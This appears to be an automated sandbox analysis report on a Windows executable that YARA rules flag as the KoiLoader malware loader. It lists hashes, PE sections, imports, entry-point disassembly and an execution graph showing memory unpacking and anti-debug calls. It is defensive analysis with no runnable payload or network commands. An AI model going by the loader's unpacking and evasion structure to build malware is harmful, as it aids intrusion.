              SHA512:1116a3069bb64adc88d1b1f153c4a533a0a2479a92ae81f1a2bc76a7b6ef92f3b1975f683c0a26b2c6fd479182506ff33cd37389a129bb03c77fca8496102271
              SSDEEP:3072:DCmlA+2TGMF85+bkRG32foUP9GmPe97UoenR6ftqgNbapWWmmE3aNZ:GmlV4h8JG3QUzeROHapWWk3aNZ
              TLSH:BC044AE2B1CC94F1D96A173308B266F8853CE4250BDB8ADFDF74087F9B641909572D2A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......
              Icon Hash:00928e8e8686b000
              Entrypoint:0x403d44
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:66deda4204cb009d8c01c3f28c17567f
              Instruction
              call 00007F8E2C6ECE1Ch
              jmp 00007F8E2C6EC88Fh
              push ebp
              mov ebp, esp
              push 00000000h
              call dword ptr [0041105Ch]
              push dword ptr [ebp+08h]
              call dword ptr [00411058h]
              push C0000409h
              call dword ptr [0041100Ch]
              push eax
              call dword ptr [00411014h]
              pop ebp
              ret
              push ebp
              mov ebp, esp
              sub esp, 00000324h
              push 00000017h
              call dword ptr [00411060h]
              test eax, eax
              je 00007F8E2C6ECA17h
              push 00000002h
              pop ecx
              int 29h
              mov dword ptr [00418A78h], eax
              mov dword ptr [00418A74h], ecx
              mov dword ptr [00418A70h], edx
              mov dword ptr [00418A6Ch], ebx
              mov dword ptr [00418A68h], esi
              mov dword ptr [00418A64h], edi
              mov word ptr [00418A90h], ss
              mov word ptr [00418A84h], cs
              mov word ptr [00418A60h], ds
              mov word ptr [00418A5Ch], es
              mov word ptr [00418A58h], fs
              mov word ptr [00418A54h], gs
              pushfd
              pop dword ptr [00418A88h]
              mov eax, dword ptr [ebp+00h]
              mov dword ptr [00418A7Ch], eax
              mov eax, dword ptr [ebp+04h]
              mov dword ptr [00418A80h], eax
              lea eax, dword ptr [ebp+08h]
              mov dword ptr [00418A8Ch], eax
              mov eax, dword ptr [ebp-00000324h]
              mov dword ptr [004189C8h], 00010001h
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x176900x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c34.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x1130.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x166980x38.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x165d80x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x110000x120.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xfbea0xfc00f80c6e36c0496492e658927e9cbd2f9aFalse0.5602368551587301data6.555752738036374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x110000x6d0c0x6e0006a44f2522af6deb8eae500514137c22False0.4388494318181818OpenPGP Public Key4.883697607623019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x180000x163c0xa00b55402247df1a6c6692e0c2bccb8e505False0.1765625data2.3846615292625706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x1a0000x13c340x13e0002f7b73a880f9bd377b5aaf6d8373febFalse0.4514666863207547data4.810842986452613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x2e0000x11300x12006250f4910a879ac182f4b8379731bb76False0.7437065972222222data6.405937874038831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_DIALOG0x1a1180x18cdataEnglishUnited States0.6464646464646465
              RT_RCDATA0x1a2a40x10dataEnglishUnited States1.5
              RT_RCDATA0x1a2b40x13800dataEnglishUnited States0.45199819711538464
              RT_MANIFEST0x2dab40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
              DLLImport
              KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
              GDI32.dllLPtoDP
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              No network behavior found

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:04:28:18
              Start date:08/10/2024
              Path:C:\Users\user\Desktop\DWbCUTdGhV.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\DWbCUTdGhV.exe"
              Imagebase:0x790000
              File size:182'272 bytes
              MD5 hash:13B4C5DFF00CF1EA8A635743903E387F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:7.5%
                Dynamic/Decrypted Code Coverage:17.3%
                Signature Coverage:17.6%
                Total number of Nodes:1245
                Total number of Limit Nodes:9
                execution_graph 10378 793bc8 10379 793bd4 __FrameHandler3::FrameUnwindToState 10378->10379 10404 793f25 10379->10404 10381 793bdb 10382 793d2e 10381->10382 10390 793c05 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 10381->10390 10447 79421c IsProcessorFeaturePresent 10382->10447 10384 793d35 10451 7976e3 10384->10451 10389 793c24 10390->10389 10394 793ca5 10390->10394 10430 7976bd 10390->10430 10392 793cab 10416 792f40 10392->10416 10412 794337 10394->10412 10399 793ccb 10400 793cd4 10399->10400 10438 797698 10399->10438 10441 794099 10400->10441 10405 793f2e 10404->10405 10457 7944c5 IsProcessorFeaturePresent 10405->10457 10409 793f3f 10411 793f43 10409->10411 10467 794ecd 10409->10467 10411->10381 10527 794f20 10412->10527 10415 79435d 10415->10392 10529 792ae0 10416->10529 10419 792f8c ExitProcess 10420 792f81 GetLastError 10420->10419 10421 792f94 BuildCommDCBAndTimeoutsA 10420->10421 10422 792fa7 GetCurrentProcess TerminateProcess 10421->10422 10423 792fb6 10421->10423 10422->10423 10601 791710 10423->10601 10429 792fe0 10436 79436d GetModuleHandleW 10429->10436 10431 7976d3 __FrameHandler3::FrameUnwindToState _unexpected 10430->10431 10431->10394 11032 79832a GetLastError 10431->11032 10437 793cc7 10436->10437 10437->10384 10437->10399 11581 79753e 10438->11581 10442 7940a5 10441->10442 10443 793cdc 10442->10443 11651 797cfb 10442->11651 10443->10389 10445 7940b3 10446 794ecd ___scrt_uninitialize_crt 7 API calls 10445->10446 10446->10443 10448 794232 __FrameHandler3::FrameUnwindToState 10447->10448 10449 7942dd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10448->10449 10450 794328 __FrameHandler3::FrameUnwindToState 10449->10450 10450->10384 10452 79753e __FrameHandler3::FrameUnwindToState 23 API calls 10451->10452 10453 793d3b 10452->10453 10454 7976a7 10453->10454 10455 79753e __FrameHandler3::FrameUnwindToState 23 API calls 10454->10455 10456 793d43 10455->10456 10458 793f3a 10457->10458 10459 794eae 10458->10459 10473 7960a7 10459->10473 10462 794eb7 10462->10409 10464 794ebf 10465 794eca 10464->10465 10487 7960e3 10464->10487 10465->10409 10468 794ee0 10467->10468 10469 794ed6 10467->10469 10468->10411 10470 795169 ___vcrt_uninitialize_ptd 6 API calls 10469->10470 10471 794edb 10470->10471 10472 7960e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10471->10472 10472->10468 10474 7960b0 10473->10474 10476 7960d9 10474->10476 10477 794eb3 10474->10477 10491 7962ec 10474->10491 10478 7960e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10476->10478 10477->10462 10479 795136 10477->10479 10478->10477 10508 7961fd 10479->10508 10482 79514b 10482->10464 10485 795166 10485->10464 10488 7960ee 10487->10488 10490 79610d 10487->10490 10489 7960f8 DeleteCriticalSection 10488->10489 10489->10489 10489->10490 10490->10462 10496 796112 10491->10496 10494 79630f 10494->10474 10495 796324 InitializeCriticalSectionAndSpinCount 10495->10494 10497 79612f 10496->10497 10498 796133 10496->10498 10497->10494 10497->10495 10498->10497 10499 79619b GetProcAddress 10498->10499 10501 79618c 10498->10501 10503 7961b2 LoadLibraryExW 10498->10503 10499->10497 10501->10499 10502 796194 FreeLibrary 10501->10502 10502->10499 10504 7961c9 GetLastError 10503->10504 10505 7961f9 10503->10505 10504->10505 10506 7961d4 ___vcrt_FlsFree 10504->10506 10505->10498 10506->10505 10507 7961ea LoadLibraryExW 10506->10507 10507->10498 10509 796112 ___vcrt_FlsFree 5 API calls 10508->10509 10510 796217 10509->10510 10511 796230 TlsAlloc 10510->10511 10512 795140 10510->10512 10512->10482 10513 7962ae 10512->10513 10514 796112 ___vcrt_FlsFree 5 API calls 10513->10514 10515 7962c8 10514->10515 10516 7962e3 TlsSetValue 10515->10516 10517 795159 10515->10517 10516->10517 10517->10485 10518 795169 10517->10518 10519 795179 10518->10519 10520 795173 10518->10520 10519->10482 10522 796238 10520->10522 10523 796112 ___vcrt_FlsFree 5 API calls 10522->10523 10524 796252 10523->10524 10525 79626a TlsFree 10524->10525 10526 79625e 10524->10526 10525->10526 10526->10519 10528 79434a GetStartupInfoW 10527->10528 10528->10415 10530 792b16 10529->10530 10632 793040 10530->10632 10535 793040 27 API calls 10536 792bb9 10535->10536 10657 792870 10536->10657 10539 793040 27 API calls 10540 792c1c 10539->10540 10660 7928a0 10540->10660 10545 793040 27 API calls 10546 792c5c 10545->10546 10547 793040 27 API calls 10546->10547 10548 792c75 10547->10548 10680 792a60 10548->10680 10552 792c9b 10553 793040 27 API calls 10552->10553 10554 792cd2 10553->10554 10555 793040 27 API calls 10554->10555 10556 792d05 10555->10556 10690 792450 10556->10690 10559 793040 27 API calls 10560 792d23 10559->10560 10709 792540 10560->10709 10567 793040 27 API calls 10568 792d7b 10567->10568 10569 793040 27 API calls 10568->10569 10570 792d94 10569->10570 10571 793040 27 API calls 10570->10571 10572 792dad 10571->10572 10756 791e90 10572->10756 10575 793040 27 API calls 10576 792df2 10575->10576 10577 793040 27 API calls 10576->10577 10578 792e1b 10577->10578 10785 791ff0 10578->10785 10581 793040 27 API calls 10582 792e40 10581->10582 10796 792090 10582->10796 10585 793020 task 25 API calls 10586 792e5d 10585->10586 10587 793040 27 API calls 10586->10587 10588 792e6f 10587->10588 10589 793040 27 API calls 10588->10589 10590 792e88 10589->10590 10591 793040 27 API calls 10590->10591 10592 792ea1 10591->10592 10593 793040 27 API calls 10592->10593 10594 792eba 10593->10594 10595 793040 27 API calls 10594->10595 10596 792ed9 10595->10596 10597 793020 task 25 API calls 10596->10597 10598 792f01 10597->10598 10801 7921a0 10598->10801 11011 791110 GetModuleHandleA 10601->11011 10603 79173c 10604 791110 17 API calls 10603->10604 10607 791750 10604->10607 10605 796940 ___std_exception_copy 14 API calls 10606 791848 10605->10606 10608 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10606->10608 10609 796b68 ___std_exception_copy 15 API calls 10607->10609 10617 79183c 10607->10617 10610 791855 10608->10610 10611 79178f 10609->10611 10618 792ff0 10610->10618 11017 791300 GetModuleHandleA VirtualAlloc 10611->11017 10614 796940 ___std_exception_copy 14 API calls 10615 791830 10614->10615 10616 796940 ___std_exception_copy 14 API calls 10615->10616 10616->10617 10617->10605 10619 793020 task 25 API calls 10618->10619 10620 793002 10619->10620 10621 793020 task 25 API calls 10620->10621 10622 79300d 10621->10622 10623 793020 task 25 API calls 10622->10623 10624 792fd0 10623->10624 10625 793a94 10624->10625 10626 793a9d IsProcessorFeaturePresent 10625->10626 10627 793a9c 10625->10627 10629 793d8b 10626->10629 10627->10429 11031 793d4e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10629->11031 10631 793e6e 10631->10429 10633 793075 operator!= char_traits 10632->10633 10836 793440 10633->10836 10636 7926f0 10637 793040 27 API calls 10636->10637 10638 792753 10637->10638 10639 793040 27 API calls 10638->10639 10640 792779 10639->10640 10641 793040 27 API calls 10640->10641 10642 792791 10641->10642 10643 793040 27 API calls 10642->10643 10644 7927ae operator!= 10643->10644 10645 793020 task 25 API calls 10644->10645 10646 7927cf 10645->10646 10647 793020 task 25 API calls 10646->10647 10648 7927de 10647->10648 10649 793020 task 25 API calls 10648->10649 10650 79282e 10649->10650 10651 793020 task 25 API calls 10650->10651 10652 79283a 10651->10652 10653 793020 task 25 API calls 10652->10653 10654 792849 10653->10654 10655 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10654->10655 10656 79285e 10655->10656 10656->10535 10658 793020 task 25 API calls 10657->10658 10659 79288e 10658->10659 10659->10539 10661 793040 27 API calls 10660->10661 10662 7928e6 10661->10662 10663 793040 27 API calls 10662->10663 10665 79290f 10663->10665 10664 793020 task 25 API calls 10666 7929b7 10664->10666 10665->10664 10667 793020 task 25 API calls 10666->10667 10668 7929c3 10667->10668 10669 793020 task 25 API calls 10668->10669 10670 7929d2 10669->10670 10671 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10670->10671 10672 7929e7 10671->10672 10673 7929f0 10672->10673 10674 793040 27 API calls 10673->10674 10676 792a14 10674->10676 10675 793020 task 25 API calls 10677 792a48 10675->10677 10676->10675 10678 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10677->10678 10679 792a52 10678->10679 10679->10545 10681 793040 27 API calls 10680->10681 10682 792aa3 10681->10682 10683 793020 task 25 API calls 10682->10683 10684 792ab8 10683->10684 10685 793020 task 25 API calls 10684->10685 10686 792ac7 10685->10686 10687 793020 10686->10687 10996 793160 10687->10996 10689 79302f task 10689->10552 10691 793040 27 API calls 10690->10691 10692 79248f 10691->10692 10693 793040 27 API calls 10692->10693 10694 7924ad 10693->10694 10695 793040 27 API calls 10694->10695 10696 7924dc 10695->10696 10697 793020 task 25 API calls 10696->10697 10698 7924eb 10697->10698 10699 793020 task 25 API calls 10698->10699 10700 7924f7 10699->10700 10701 793020 task 25 API calls 10700->10701 10702 792503 10701->10702 10703 793020 task 25 API calls 10702->10703 10704 79250f 10703->10704 10705 793020 task 25 API calls 10704->10705 10706 79251e 10705->10706 10707 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10706->10707 10708 792536 10707->10708 10708->10559 10710 793040 27 API calls 10709->10710 10712 79258f 10710->10712 10711 793040 27 API calls 10713 7925e1 10711->10713 10712->10711 10714 793040 27 API calls 10713->10714 10715 7925fb operator!= 10714->10715 10716 793020 task 25 API calls 10715->10716 10717 792619 10716->10717 10718 793020 task 25 API calls 10717->10718 10720 792628 10718->10720 10719 793020 task 25 API calls 10721 7926c2 10719->10721 10720->10719 10722 793020 task 25 API calls 10721->10722 10723 7926d1 10722->10723 10724 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10723->10724 10725 7926e6 10724->10725 10726 791bd0 10725->10726 10727 793040 27 API calls 10726->10727 10728 791c15 10727->10728 10729 793040 27 API calls 10728->10729 10730 791c30 10729->10730 10731 793040 27 API calls 10730->10731 10732 791c4a operator!= 10731->10732 10733 793020 task 25 API calls 10732->10733 10734 791c68 10733->10734 10735 793020 task 25 API calls 10734->10735 10736 791c77 10735->10736 10737 793020 task 25 API calls 10736->10737 10738 791d14 10737->10738 10739 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10738->10739 10740 791d29 10739->10740 10741 791d30 10740->10741 10742 793040 27 API calls 10741->10742 10743 791d68 10742->10743 10744 793040 27 API calls 10743->10744 10745 791d94 10744->10745 10746 793040 27 API calls 10745->10746 10747 791dae operator!= 10746->10747 10748 793020 task 25 API calls 10747->10748 10749 791dcc 10748->10749 10750 793020 task 25 API calls 10749->10750 10751 791ddb 10750->10751 10752 793020 task 25 API calls 10751->10752 10753 791e73 10752->10753 10754 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10753->10754 10755 791e88 10754->10755 10755->10567 10757 793040 27 API calls 10756->10757 10758 791ed2 10757->10758 10759 793040 27 API calls 10758->10759 10760 791eea 10759->10760 10761 793040 27 API calls 10760->10761 10762 791f03 10761->10762 10763 793040 27 API calls 10762->10763 10764 791f17 10763->10764 10765 793040 27 API calls 10764->10765 10766 791f34 operator!= 10765->10766 10767 793020 task 25 API calls 10766->10767 10768 791f55 10767->10768 10769 793020 task 25 API calls 10768->10769 10772 791f64 10769->10772 10770 793020 task 25 API calls 10771 791f94 10770->10771 10773 793020 task 25 API calls 10771->10773 10772->10770 10774 791fa0 10773->10774 10775 793020 task 25 API calls 10774->10775 10776 791fac 10775->10776 10777 793020 task 25 API calls 10776->10777 10778 791fb8 10777->10778 10779 793020 task 25 API calls 10778->10779 10780 791fc4 10779->10780 10781 793020 task 25 API calls 10780->10781 10782 791fd3 10781->10782 10783 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10782->10783 10784 791fe8 10783->10784 10784->10575 10786 793040 27 API calls 10785->10786 10787 792036 10786->10787 10788 793020 task 25 API calls 10787->10788 10789 79204f 10788->10789 10790 793020 task 25 API calls 10789->10790 10791 79205b 10790->10791 10792 793020 task 25 API calls 10791->10792 10793 79206a 10792->10793 10794 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10793->10794 10795 792082 10794->10795 10795->10581 10797 793040 27 API calls 10796->10797 10798 7920d3 10797->10798 10799 793020 task 25 API calls 10798->10799 10800 7920eb 10799->10800 10800->10585 10802 793040 27 API calls 10801->10802 10803 7921de 10802->10803 10804 793040 27 API calls 10803->10804 10805 7921f2 10804->10805 10806 793040 27 API calls 10805->10806 10807 792203 10806->10807 10808 793040 27 API calls 10807->10808 10809 792214 10808->10809 10810 793040 27 API calls 10809->10810 10811 79225a 10810->10811 10812 793040 27 API calls 10811->10812 10813 792280 operator!= 10812->10813 10814 793020 task 25 API calls 10813->10814 10815 7922aa 10814->10815 10816 793020 task 25 API calls 10815->10816 10817 7922b9 10816->10817 10818 793040 27 API calls 10817->10818 10819 79235e 10818->10819 10820 793040 27 API calls 10819->10820 10821 792384 operator!= 10820->10821 10822 793020 task 25 API calls 10821->10822 10823 7923ae 10822->10823 10824 793020 task 25 API calls 10823->10824 10825 7923bd 10824->10825 10826 793020 task 25 API calls 10825->10826 10827 792403 10826->10827 10828 793020 task 25 API calls 10827->10828 10829 79240f 10828->10829 10830 793020 task 25 API calls 10829->10830 10831 79241b 10830->10831 10832 793020 task 25 API calls 10831->10832 10833 79242a 10832->10833 10834 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10833->10834 10835 792445 LPtoDP 10834->10835 10835->10419 10835->10420 10847 793680 10836->10847 10840 793465 task 10846 7934ab task operator!= 10840->10846 10854 793610 10840->10854 10844 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10845 792b68 10844->10845 10845->10636 10846->10844 10848 79369b _Min_value task _Max_value 10847->10848 10849 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10848->10849 10850 79345b 10849->10850 10850->10840 10851 791bc0 10850->10851 10863 793a74 10851->10863 10855 793680 5 API calls 10854->10855 10856 79361f 10855->10856 10906 793790 10856->10906 10859 793730 10860 793740 allocator 10859->10860 10910 7938a0 10860->10910 10868 7939fc 10863->10868 10867 793a93 10874 7939ac 10868->10874 10871 794c96 10872 794cdd RaiseException 10871->10872 10873 794cb0 10871->10873 10872->10867 10873->10872 10877 794a5b 10874->10877 10878 794a68 10877->10878 10884 7939d8 10877->10884 10878->10884 10885 796b68 10878->10885 10883 794a95 10903 796940 10883->10903 10884->10871 10886 79857c 10885->10886 10887 7985ba 10886->10887 10889 7985a5 HeapAlloc 10886->10889 10892 79858e _unexpected 10886->10892 10888 79881d __dosmaperr 14 API calls 10887->10888 10890 794a85 10888->10890 10891 7985b8 10889->10891 10889->10892 10890->10883 10894 797e0a 10890->10894 10891->10890 10892->10887 10892->10889 10893 796b82 _Allocate EnterCriticalSection LeaveCriticalSection 10892->10893 10893->10892 10896 797e17 10894->10896 10898 797e25 10894->10898 10895 79881d __dosmaperr 14 API calls 10897 797e2d 10895->10897 10896->10898 10901 797e3c 10896->10901 10899 796b07 ___std_exception_copy 25 API calls 10897->10899 10898->10895 10900 797e37 10899->10900 10900->10883 10901->10900 10902 79881d __dosmaperr 14 API calls 10901->10902 10902->10897 10904 797fb2 _free 14 API calls 10903->10904 10905 796958 10904->10905 10905->10884 10907 7937b1 _Max_value 10906->10907 10908 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10907->10908 10909 79350c 10908->10909 10909->10859 10911 7938ac 10910->10911 10914 7938ba 10910->10914 10916 793930 10911->10916 10913 793749 10913->10846 10914->10913 10924 791b00 10914->10924 10917 79394c 10916->10917 10918 793947 10916->10918 10920 791b00 _Allocate 16 API calls 10917->10920 10927 791a80 10918->10927 10923 793955 10920->10923 10922 793970 10922->10913 10923->10922 10931 796b17 10923->10931 10977 793aa2 10924->10977 10928 791a8e stdext::threads::lock_error::lock_error 10927->10928 10929 794c96 CallUnexpected RaiseException 10928->10929 10930 791a9c 10929->10930 10930->10917 10936 796aa3 10931->10936 10933 796b26 10944 796b34 IsProcessorFeaturePresent 10933->10944 10935 796b33 10948 798481 GetLastError 10936->10948 10938 796abc 10938->10933 10939 796aae 10939->10938 10940 796b34 _Allocate 11 API calls 10939->10940 10941 796b06 10940->10941 10942 796aa3 _Allocate 25 API calls 10941->10942 10943 796b13 10942->10943 10943->10933 10945 796b40 10944->10945 10971 79695b 10945->10971 10949 798498 10948->10949 10950 79849e 10948->10950 10951 79a61d _unexpected 6 API calls 10949->10951 10952 79a65c _unexpected 6 API calls 10950->10952 10967 7984a4 SetLastError 10950->10967 10951->10950 10953 7984bc 10952->10953 10954 798830 _unexpected 12 API calls 10953->10954 10953->10967 10956 7984cc 10954->10956 10957 7984eb 10956->10957 10958 7984d4 10956->10958 10959 79a65c _unexpected 6 API calls 10957->10959 10960 79a65c _unexpected 6 API calls 10958->10960 10961 7984f7 10959->10961 10968 7984e2 10960->10968 10962 7984fb 10961->10962 10963 79850c 10961->10963 10965 79a65c _unexpected 6 API calls 10962->10965 10966 798158 _unexpected 12 API calls 10963->10966 10964 797fb2 _free 12 API calls 10964->10967 10965->10968 10969 798517 10966->10969 10967->10939 10968->10964 10970 797fb2 _free 12 API calls 10969->10970 10970->10967 10972 796977 __FrameHandler3::FrameUnwindToState 10971->10972 10973 7969a3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10972->10973 10976 796a74 __FrameHandler3::FrameUnwindToState 10973->10976 10974 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10975 796a92 GetCurrentProcess TerminateProcess 10974->10975 10975->10935 10976->10974 10980 793aa7 10977->10980 10978 796b68 ___std_exception_copy 15 API calls 10978->10980 10979 791b0c 10979->10913 10980->10978 10980->10979 10983 793ac3 _Allocate 10980->10983 10987 796b82 10980->10987 10982 793e8c stdext::threads::lock_error::lock_error 10984 794c96 CallUnexpected RaiseException 10982->10984 10983->10982 10986 794c96 CallUnexpected RaiseException 10983->10986 10985 793ea9 10984->10985 10986->10982 10990 796baf 10987->10990 10991 796bbb __FrameHandler3::FrameUnwindToState 10990->10991 10992 79860b __FrameHandler3::FrameUnwindToState EnterCriticalSection 10991->10992 10993 796bc6 10992->10993 10994 796c02 _Allocate LeaveCriticalSection 10993->10994 10995 796b8d 10994->10995 10995->10980 10998 793196 task 10996->10998 10997 7931da task 10997->10689 10998->10997 11000 793360 10998->11000 11003 7935b0 11000->11003 11002 793374 11002->10997 11004 7935e8 _MallocaArrayHolder 11003->11004 11005 7935db 11003->11005 11004->11002 11007 791b20 11005->11007 11009 791b5e 11007->11009 11008 796b17 _Allocate 25 API calls 11008->11009 11009->11008 11010 791b79 11009->11010 11010->11004 11012 791132 11011->11012 11013 79115a GetModuleHandleW 11012->11013 11014 79117f 11013->11014 11015 796b68 ___std_exception_copy 15 API calls 11014->11015 11016 7911ad __InternalCxxFrameHandler 11014->11016 11015->11016 11016->10603 11018 791352 11017->11018 11022 791359 __InternalCxxFrameHandler 11017->11022 11019 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11018->11019 11020 7916b0 GetPEB GetUserDefaultLCID 11019->11020 11020->10614 11021 7914ef 11023 791508 VirtualProtect 11021->11023 11022->11021 11025 79142f GetModuleHandleA GetProcAddress LoadLibraryA 11022->11025 11027 791490 11022->11027 11024 79152a 11023->11024 11024->11018 11026 791573 VirtualFree 11024->11026 11029 791593 VirtualProtect 11024->11029 11025->11022 11026->11024 11027->11022 11028 7914d5 GetProcAddress 11027->11028 11028->11027 11029->11018 11031->10631 11033 798347 11032->11033 11034 798341 11032->11034 11058 79834d SetLastError 11033->11058 11075 79a65c 11033->11075 11070 79a61d 11034->11070 11041 79837d 11045 79a65c _unexpected 6 API calls 11041->11045 11042 798394 11047 79a65c _unexpected 6 API calls 11042->11047 11043 797d9b 11059 797dc6 11043->11059 11044 7983e1 11046 797dc6 __FrameHandler3::FrameUnwindToState 64 API calls 11044->11046 11048 79838b 11045->11048 11049 7983e6 11046->11049 11050 7983a0 11047->11050 11087 797fb2 11048->11087 11051 7983b5 11050->11051 11052 7983a4 11050->11052 11093 798158 11051->11093 11055 79a65c _unexpected 6 API calls 11052->11055 11055->11048 11057 797fb2 _free 14 API calls 11057->11058 11058->11043 11058->11044 11256 79a9c7 11059->11256 11063 797de0 IsProcessorFeaturePresent 11066 797dec 11063->11066 11064 797dff 11067 7976a7 __FrameHandler3::FrameUnwindToState 23 API calls 11064->11067 11065 797dd6 11065->11063 11065->11064 11068 79695b __FrameHandler3::FrameUnwindToState 8 API calls 11066->11068 11069 797e09 11067->11069 11068->11064 11098 79a4dc 11070->11098 11072 79a639 11073 79a642 11072->11073 11074 79a654 TlsGetValue 11072->11074 11073->11033 11076 79a4dc _unexpected 5 API calls 11075->11076 11077 79a678 11076->11077 11078 79a696 TlsSetValue 11077->11078 11079 798365 11077->11079 11079->11058 11080 798830 11079->11080 11085 79883d _unexpected 11080->11085 11081 79887d 11111 79881d 11081->11111 11082 798868 HeapAlloc 11084 798375 11082->11084 11082->11085 11084->11041 11084->11042 11085->11081 11085->11082 11086 796b82 _Allocate 2 API calls 11085->11086 11086->11085 11088 797fe6 __dosmaperr 11087->11088 11089 797fbd HeapFree 11087->11089 11088->11058 